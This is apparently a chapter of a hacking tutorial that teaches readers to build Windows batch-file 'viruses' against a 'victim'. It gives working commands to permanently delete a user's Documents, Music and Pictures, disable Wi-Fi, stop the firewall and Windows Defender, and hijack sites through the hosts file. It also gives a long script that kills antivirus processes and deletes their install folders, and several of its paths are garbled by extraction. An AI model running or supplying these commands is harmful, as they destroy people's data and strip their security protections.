By now you should have a pretty good grip on working with batch files. The time has come for you to fly out of the nest. Presented below are a few ideas for things that you can make your viruses do.

These commands should work on most Windows 10 systems with default configuration. However, you may need to tweak some of them before they work for you. For example, to kill your victim’s anti-virus, you’ll need to know what anti-virus they have in the first place, only then can you stop it’s process and delete it.

Warning: Executing some of these commands WILL result in permanent loss of data. If you want to try these out, do so in a virtual machine.

Delete important stuff

Damaging personal data is a purely destructive attack motive. The attacker gains nothing but the victim loses something. For better or worse, this is something that batch files really shine at. Batch files can quietly delete vast quantities of data without the victim ever realizing what’s happening until it’s too late. And using the del command means the data is not going to the recycle bin, it’s permanently deleted.

What’s even scarier is that most directories, including the examples below, don’t require admin privileges to access, by default. However, if you are able to run a batch file as an administrator then that opens up the entire system to attack (such as deleting anti-viruses to allow other malware to roam freely).

Delete Documents del /f /q "%userprofile% \D ocuments \* .*"

Delete Music del /f /q "%userprofile% \M usic \* .*"

Delete Pictures del /f /q "%userprofile% \P ictures \* .*"

Disable Important stuff

The fact that windows provides utilities and services that can be accessed through the command line opens up yet another attack vector. Changing important configurations such as registry entries can render a computer unusable.

Disable Wi-Fi - Let’s see how we can go about this. First we find out the names of all the network interfaces: netsh interface show interface This outputs: Admin State State Type Interface Name ------------------------------------------------------------------------- Enabled Disconnected Dedicated Ethernet Enabled Connected Dedicated VirtualBox Host-Only Network Enabled Connected Dedicated Ethernet 2 Enabled Connected Dedicated Wi-Fi For my computer, the wireless interface is simply named Wi-Fi (it may be different for you). And now we can just disable it: netsh interface set interface "Wi-Fi" Disable And the Wi-Fi stops working and also the Wi-Fi icon disappears from the taskbar. It can be re-enabled by using this command: (P.S: Disabling/Enabling interfaces requires admin privileges.) netsh interface set interface "Wi-Fi" Enable Or through the control panel:

Disable the firewall net stop "MpsSvc"

Stop Windows Defender taskkill /f /t /im "MSASCuiL.exe" taskkill /f /t /im "MSASCui.exe"

Block Websites

We can block any website we want by editing the hosts file:

cd "C: \W indows \S ystem32 \D rivers \e tc" echo 127.0.0.1 google.com >> "hosts" echo 127.0.0.1 www.google.com >> "hosts"

127.0.0.1 is the localhost. The above command tells the computer that it’s going to find google.com on your own device. So the browser doesn’t even bother trying to find out the real IP address of google.com , it just uses localhost, where of course it doesn’t get a reply. You’ll usually want to block both the top level domain as well as the www. subdomain.

This is kind of a shitty thing to do to someone, don’t you think? Maybe you should be a white-hat and make a “virus” that blocks intrusive ads and help protect your victim’s privacy.

Delete all anti-viruses

The following snippet tries to disable and delete all common anti-viruses. It’s really just a hail mary and definitely not the most appropriate way to go about this. You’ll need admin rights to run this. Below you’ll see two types of commands:

taskkill : These commands attempt to kill the running anti-virus processes. A bunch of common process names are included below. Note that we’re using the wildcard * in the names. This means, for example, av* will include all the names that begin with ‘av’. So it is possible that a whole lot of innocent process also get caught in the crossfire.

: These commands attempt to kill the running anti-virus processes. A bunch of common process names are included below. Note that we’re using the wildcard in the names. This means, for example, will include all the names that begin with ‘av’. So it is possible that a whole lot of innocent process also get caught in the crossfire. RMDIR : These commands simply delete the default installation folders of the anti-viruses.

taskkill /F /IM av * >NUL taskkill /F /IM fire * >NUL taskkill /F /IM anti * >NUL taskkill /F /IM spy * >NUL taskkill /F /IM bullguard * >NUL taskkill /F /IM PersFw * >NUL taskkill /F /IM KAV * >NUL taskkill /F /IM ZONEALARM * >NUL taskkill /F /IM SAFEWEB * >NUL taskkill /F /IM OUTPOST * >NUL taskkill /F /IM nv * >NUL taskkill /F /IM nav * >NUL taskkill /F /IM F- * >NUL taskkill /F /IM ESAFE * >NUL taskkill /F /IM cle * >NUL taskkill /F /IM BLACKICE * >NUL taskkill /F /IM def * >NUL taskkill /F /IM kav * >NUL taskkill /F /IM kav * >NUL taskkill /F /IM avg * >NUL taskkill /F /IM ash * >NUL taskkill /F /IM aswupdsv * >NUL taskkill /F /IM ewid * >NUL taskkill /F /IM guar * >NUL taskkill /F /IM gcasDt * >NUL taskkill /F /IM msmp * >NUL taskkill /F /IM mcafe * >NUL taskkill /F /IM mghtml * >NUL taskkill /F /IM msiexec * >NUL taskkill /F /IM outpost * >NUL taskkill /F /IM isafe * >NUL taskkill /F /IM zap * >NUL taskkill /F /IM zauinst * >NUL taskkill /F /IM upd * >NUL taskkill /F /IM zlclien * >NUL taskkill /F /IM minilog * >NUL taskkill /F /IM norton * >NUL taskkill /F /IM ccc * >NUL taskkill /F /IM npfmn * >NUL taskkill /F /IM loge * >NUL taskkill /F /IM nisum * >NUL taskkill /F /IM issvc * >NUL taskkill /F /IM tmp * >NUL taskkill /F /IM tmn * >NUL taskkill /F /IM pcc * >NUL taskkill /F /IM cpd * >NUL taskkill /F /IM pop * >NUL taskkill /F /IM pav * >NUL taskkill /F /IM padmin * >NUL taskkill /F /IM panda * >NUL taskkill /F /IM avsch * >NUL taskkill /F /IM sche * >NUL taskkill /F /IM syman * >NUL taskkill /F /IM virus * >NUL taskkill /F /IM realm * >NUL taskkill /F /IM sweep * >NUL taskkill /F /IM scan * >NUL taskkill /F /IM ad- * >NUL taskkill /F /IM safe * >NUL taskkill /F /IM avas * >NUL taskkill /F /IM norm * >NUL taskkill /F /IM offg * >NUL RMDIR /Q "C: \P rogram Files \a lwils~1" /S >NUL RMDIR /Q "C: \P rogram Files \L avasoft \A d-awa~1" /S >NUL RMDIR /Q "C: \P rogram Files \k asper~1" /S >NUL RMDIR /Q "C: \P rogram Files \t rojan~1" /S >NUL RMDIR /Q "C: \P rogram Files \f -prot95" /S >NUL RMDIR /Q "C: \P rogram Files \t bav" /S >NUL RMDIR /Q "C: \P rogram Files \a vpersonal" /S >NUL RMDIR /Q "C: \P rogram Files \N orton~1" /S >NUL RMDIR /Q "C: \P rogram Files \M cafee" /S >NUL RMDIR /Q "C: \P rogram Files \N orton~1 \N orton~1 \N orton~3" /S >NUL RMDIR /Q "C: \P rogram Files \N orton~1 \N orton~1 \s peedd~1" /S >NUL RMDIR /Q "C: \P rogram Files \N orton~1 \N orton~1" /S >NUL RMDIR /Q "C: \P rogram Files \N orton~1" /S >NUL RMDIR /Q "C: \P rogram Files \a vgamsr" /S >NUL RMDIR /Q "C: \P rogram Files \a vgamsvr" /S >NUL RMDIR /Q "C: \P rogram Files \a vgemc" /S >NUL RMDIR /Q "C: \P rogram Files \a vgcc" /S >NUL RMDIR /Q "C: \P rogram Files \a vgupsvc" /S >NUL RMDIR /Q "C: \P rogram Files \g risoft" /S >NUL RMDIR /Q "C: \P rogram Files

ood32krn" /S >NUL RMDIR /Q "C: \P rogram Files

ood32" /S >NUL RMDIR /Q "C: \P rogram Files

od32" /S >NUL RMDIR /Q "C: \P rogram Files

ood32" /S >NUL RMDIR /Q "C: \P rogram Files \k av" /S >NUL RMDIR /Q "C: \P rogram Files \k avmm" /S >NUL RMDIR /Q "C: \P rogram Files \k aspersky" /S >NUL RMDIR /Q "C: \P rogram Files \e widoctrl" /S >NUL RMDIR /Q "C: \P rogram Files \g uard" /S >NUL RMDIR /Q "C: \P rogram Files \e wido" /S >NUL RMDIR /Q "C: \P rogram Files \p avprsrv" /S >NUL RMDIR /Q "C: \P rogram Files \p avprot" /S >NUL RMDIR /Q "C: \P rogram Files \a vengine" /S >NUL RMDIR /Q "C: \P rogram Files \a pvxdwin" /S >NUL RMDIR /Q "C: \P rogram Files \w ebproxy" /S >NUL RMDIR /Q "C: \P rogram Files \p anda software" /S >NUL

Our journey has only just begun so we must keep moving. It should go without saying that you must use this knowledge ethically. Today’s systems are largely protected from little batch file viruses, but soon we’re going to learn about hacking techniques that can be used to really hurt people and businesses, financially or otherwise. And with that we bid farewell to batch file viruses.

Next up, we’re going to have a little fun and learn about something quite explosive.